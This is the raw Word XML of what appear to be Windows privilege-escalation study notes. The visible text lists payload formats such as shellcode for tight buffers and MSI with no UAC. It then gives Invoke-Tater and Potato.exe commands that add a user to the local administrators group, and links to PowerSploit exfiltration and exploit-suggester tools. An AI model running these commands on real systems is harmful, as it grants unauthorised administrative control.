        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393F10">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>exe-only</w:t>
      </w:r>
      <w:r w:rsidRPr="00393F10">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r w:rsidRPr="00393F10">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>not sure on this on, never used it...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5176F0CF" w14:textId="77777777" w:rsidR="00393F10" w:rsidRPr="00393F10" w:rsidRDefault="00393F10" w:rsidP="00393F10">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="323131"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393F10">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>exe-service</w:t>
      </w:r>
      <w:r w:rsidRPr="00393F10">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>: runs as a service instead of a process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B011388" w14:textId="77777777" w:rsidR="00393F10" w:rsidRPr="00393F10" w:rsidRDefault="00393F10" w:rsidP="00393F10">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="323131"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393F10">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>exe-small</w:t>
      </w:r>
      <w:r w:rsidRPr="00393F10">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">: creates smallest version of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00393F10">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>ShellCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00393F10">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> (may include bad chars). Used for tight buffers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53573C8B" w14:textId="77777777" w:rsidR="00393F10" w:rsidRPr="00393F10" w:rsidRDefault="00393F10" w:rsidP="00393F10">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="323131"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00393F10">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>msi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00393F10">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>: wraps an executable in an MSI for auto execution when run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09464951" w14:textId="00766736" w:rsidR="00F2134A" w:rsidRPr="00393F10" w:rsidRDefault="00393F10" w:rsidP="00F2134A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="323131"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00393F10">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>msi-nouac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00393F10">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>: MSI with no UAC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667E7640" w14:textId="046839C9" w:rsidR="00B310DA" w:rsidRDefault="00F2134A" w:rsidP="001807D1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="323131"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="323131"/>
        </w:rPr>
        <w:t xml:space="preserve">Invoke-Tater -Trigger 1 -Command "net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="323131"/>
        </w:rPr>
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="323131"/>
        </w:rPr>
        <w:t xml:space="preserve"> administrators user /add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7D8686" w14:textId="18C0B3D4" w:rsidR="00F2134A" w:rsidRPr="001807D1" w:rsidRDefault="00F2134A" w:rsidP="001807D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="323131"/>
        </w:rPr>
        <w:t>Potato.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="323131"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="323131"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.216.143 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="323131"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="323131"/>
        </w:rPr>
        <w:t xml:space="preserve"> "net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="323131"/>
        </w:rPr>
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="323131"/>
        </w:rPr>
        <w:t xml:space="preserve"> administrators user /add" -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="323131"/>
        </w:rPr>
        <w:t>disable_exhaust</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="323131"/>
        </w:rPr>
        <w:t xml:space="preserve"> true</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F2134A" w:rsidRPr="001807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52B8A" w14:textId="77777777" w:rsidR="009C445E" w:rsidRDefault="009C445E" w:rsidP="004D2A5D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3AEF75E0" w14:textId="77777777" w:rsidR="009C445E" w:rsidRDefault="009C445E" w:rsidP="004D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3CFAF" w14:textId="77777777" w:rsidR="009C445E" w:rsidRDefault="009C445E" w:rsidP="004D2A5D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="252B89B3" w14:textId="77777777" w:rsidR="009C445E" w:rsidRDefault="009C445E" w:rsidP="004D2A5D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="1">
    <w:p w14:paraId="3C611488" w14:textId="11EC07FB" w:rsidR="004D2A5D" w:rsidRDefault="004D2A5D">
      <w:pPr>
        <w:pStyle w:val="FootnoteText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FootnoteReference"/>
        </w:rPr>
        <w:footnoteRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1" w:history="1">
        <w:r w:rsidRPr="00586C47">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-control-registry-tre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2481B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0DDE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0719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69"/>
    <w:rsid w:val="00001D69"/>
    <w:rsid w:val="000131ED"/>
    <w:rsid w:val="0003401D"/>
    <w:rsid w:val="00044879"/>
    <w:rsid w:val="0008263C"/>
    <w:rsid w:val="000853BF"/>
    <w:rsid w:val="000A4EDB"/>
    <w:rsid w:val="000A762B"/>
    <w:rsid w:val="000B29E1"/>
    <w:rsid w:val="000B6E17"/>
    <w:rsid w:val="00102606"/>
    <w:rsid w:val="001712E4"/>
    <w:rsid w:val="00171E85"/>
    <w:rsid w:val="001806BE"/>
    <w:rsid w:val="001807D1"/>
    <w:rsid w:val="0019351C"/>
    <w:rsid w:val="001C2900"/>
    <w:rsid w:val="001C6D79"/>
    <w:rsid w:val="001D1191"/>
    <w:rsid w:val="001D2DC1"/>
    <w:rsid w:val="001D6955"/>
    <w:rsid w:val="001E2D08"/>
    <w:rsid w:val="001F4021"/>
    <w:rsid w:val="001F59CE"/>
    <w:rsid w:val="001F6E4E"/>
    <w:rsid w:val="002409BA"/>
    <w:rsid w:val="00241C0F"/>
    <w:rsid w:val="002462C2"/>
    <w:rsid w:val="00251E2C"/>
    <w:rsid w:val="002548B4"/>
    <w:rsid w:val="0025750C"/>
    <w:rsid w:val="002652FF"/>
    <w:rsid w:val="00270DDD"/>
    <w:rsid w:val="002A26B5"/>
    <w:rsid w:val="002E08D3"/>
    <w:rsid w:val="003142FF"/>
    <w:rsid w:val="00322E78"/>
    <w:rsid w:val="00342BF8"/>
    <w:rsid w:val="00344F8E"/>
    <w:rsid w:val="00355173"/>
    <w:rsid w:val="00390EF8"/>
    <w:rsid w:val="003914E9"/>
    <w:rsid w:val="00393F10"/>
    <w:rsid w:val="003B668C"/>
    <w:rsid w:val="003C6918"/>
    <w:rsid w:val="003C78A0"/>
    <w:rsid w:val="003D3C66"/>
    <w:rsid w:val="003D5630"/>
    <w:rsid w:val="003F6761"/>
    <w:rsid w:val="004039A0"/>
    <w:rsid w:val="004200D6"/>
    <w:rsid w:val="00420AB2"/>
    <w:rsid w:val="00426DBF"/>
    <w:rsid w:val="00426FF6"/>
    <w:rsid w:val="0043122C"/>
    <w:rsid w:val="00432B37"/>
    <w:rsid w:val="00435D6E"/>
    <w:rsid w:val="00450B3F"/>
    <w:rsid w:val="00456ECC"/>
    <w:rsid w:val="0047420A"/>
    <w:rsid w:val="00490290"/>
    <w:rsid w:val="004D2A5D"/>
    <w:rsid w:val="00522F91"/>
    <w:rsid w:val="0053573A"/>
    <w:rsid w:val="005522AB"/>
    <w:rsid w:val="005B4672"/>
    <w:rsid w:val="005B59ED"/>
    <w:rsid w:val="005C7DA9"/>
    <w:rsid w:val="005E0A5A"/>
    <w:rsid w:val="00600EAC"/>
    <w:rsid w:val="00607DC6"/>
    <w:rsid w:val="00646041"/>
    <w:rsid w:val="00646E89"/>
    <w:rsid w:val="00671A8C"/>
    <w:rsid w:val="00696441"/>
    <w:rsid w:val="006A23DD"/>
    <w:rsid w:val="00723B61"/>
    <w:rsid w:val="007344E1"/>
    <w:rsid w:val="007368DA"/>
    <w:rsid w:val="0074570A"/>
    <w:rsid w:val="00757A00"/>
    <w:rsid w:val="00766CD1"/>
    <w:rsid w:val="00774BDD"/>
    <w:rsid w:val="007A2866"/>
    <w:rsid w:val="007E7B40"/>
    <w:rsid w:val="007F70EB"/>
    <w:rsid w:val="00803759"/>
    <w:rsid w:val="00823394"/>
    <w:rsid w:val="008400E1"/>
    <w:rsid w:val="008500A9"/>
    <w:rsid w:val="00853426"/>
    <w:rsid w:val="008637B6"/>
    <w:rsid w:val="00881532"/>
    <w:rsid w:val="008904ED"/>
    <w:rsid w:val="00893655"/>
    <w:rsid w:val="008D76DF"/>
    <w:rsid w:val="008F0562"/>
    <w:rsid w:val="008F5A75"/>
    <w:rsid w:val="00917D9E"/>
    <w:rsid w:val="00924DD5"/>
    <w:rsid w:val="00932F84"/>
    <w:rsid w:val="00956C19"/>
    <w:rsid w:val="00962298"/>
    <w:rsid w:val="00974DF2"/>
    <w:rsid w:val="009A4F8E"/>
    <w:rsid w:val="009B4CE4"/>
    <w:rsid w:val="009C445E"/>
    <w:rsid w:val="009C4525"/>
    <w:rsid w:val="009C454E"/>
    <w:rsid w:val="009D7756"/>
    <w:rsid w:val="009E12E9"/>
    <w:rsid w:val="009E1886"/>
    <w:rsid w:val="009F2781"/>
    <w:rsid w:val="009F3ACC"/>
    <w:rsid w:val="009F5EC7"/>
    <w:rsid w:val="00A00F5F"/>
    <w:rsid w:val="00A1567E"/>
    <w:rsid w:val="00A161E7"/>
    <w:rsid w:val="00A377CD"/>
    <w:rsid w:val="00A609C0"/>
    <w:rsid w:val="00A71B9D"/>
    <w:rsid w:val="00A93A31"/>
    <w:rsid w:val="00AC20F6"/>
    <w:rsid w:val="00AC2800"/>
    <w:rsid w:val="00AC4B91"/>
    <w:rsid w:val="00AE4E77"/>
    <w:rsid w:val="00B054C1"/>
    <w:rsid w:val="00B13829"/>
    <w:rsid w:val="00B310DA"/>
    <w:rsid w:val="00B61AB4"/>
    <w:rsid w:val="00B97284"/>
    <w:rsid w:val="00B9748A"/>
    <w:rsid w:val="00BA1630"/>
    <w:rsid w:val="00BB0029"/>
    <w:rsid w:val="00BC34BD"/>
    <w:rsid w:val="00BC4342"/>
    <w:rsid w:val="00BD5B38"/>
    <w:rsid w:val="00BE438A"/>
    <w:rsid w:val="00BE4F8F"/>
    <w:rsid w:val="00BF33AF"/>
    <w:rsid w:val="00BF3D55"/>
    <w:rsid w:val="00C46BA9"/>
    <w:rsid w:val="00C63B72"/>
    <w:rsid w:val="00C67157"/>
    <w:rsid w:val="00C84E7B"/>
    <w:rsid w:val="00CA5E34"/>
    <w:rsid w:val="00CE743F"/>
    <w:rsid w:val="00CF65CF"/>
    <w:rsid w:val="00D2324A"/>
    <w:rsid w:val="00D41993"/>
    <w:rsid w:val="00D629C4"/>
    <w:rsid w:val="00D73A4D"/>
    <w:rsid w:val="00D7661C"/>
    <w:rsid w:val="00D83A1E"/>
    <w:rsid w:val="00D9067C"/>
    <w:rsid w:val="00D926CB"/>
    <w:rsid w:val="00D929E4"/>
    <w:rsid w:val="00D95B90"/>
    <w:rsid w:val="00D97C90"/>
    <w:rsid w:val="00DB31A5"/>
    <w:rsid w:val="00DE29FD"/>
    <w:rsid w:val="00E0317B"/>
    <w:rsid w:val="00E16537"/>
    <w:rsid w:val="00E16EAB"/>
    <w:rsid w:val="00E17380"/>
    <w:rsid w:val="00E27D5E"/>
    <w:rsid w:val="00E33D0C"/>
    <w:rsid w:val="00E377F7"/>
    <w:rsid w:val="00E3792A"/>
    <w:rsid w:val="00E42FAE"/>
    <w:rsid w:val="00E44591"/>
    <w:rsid w:val="00E44598"/>
    <w:rsid w:val="00E4567C"/>
    <w:rsid w:val="00E476B2"/>
    <w:rsid w:val="00E96FAA"/>
    <w:rsid w:val="00ED78E7"/>
    <w:rsid w:val="00EE256A"/>
    <w:rsid w:val="00F076AE"/>
    <w:rsid w:val="00F2134A"/>
    <w:rsid w:val="00F6272D"/>
    <w:rsid w:val="00FD724A"/>
    <w:rsid w:val="00FE739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0C0EC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F681104F-976E-47DD-9722-5956650E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D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1A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6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01D69"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00001D69"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00B61AB4"/>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D2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A5D"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FootnoteReference">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004D2A5D"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000A4EDB"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00393F10"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00393F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5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8.png"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.png"/><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docs.microsoft.com/en-us/sysinternals/downloads/accesschk" TargetMode="External"/><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docs.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated" TargetMode="External"/><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70.png"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1"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yperlink" Target="https://github.com/AonCyberLabs/Windows-Exploit-Suggester"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hyperlink" Target="https://pentestlab.blog/tag/imagepath/"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hyperlink" Target="https://github.com/sagishahar/lpeworkshop"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hyperlink" Target="https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bc-security.org/post/overview-of-empire-4-0-and-c/"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3.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9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s.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-control-registry-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A974-6764-4B29-AB82-A9F3A067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6</TotalTime>
  <Pages>42</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Gairuka Jayaweera</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sajith Jayaweera</cp:lastModifiedBy>
  <cp:revision>38</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-08-01T12:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-13T14:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>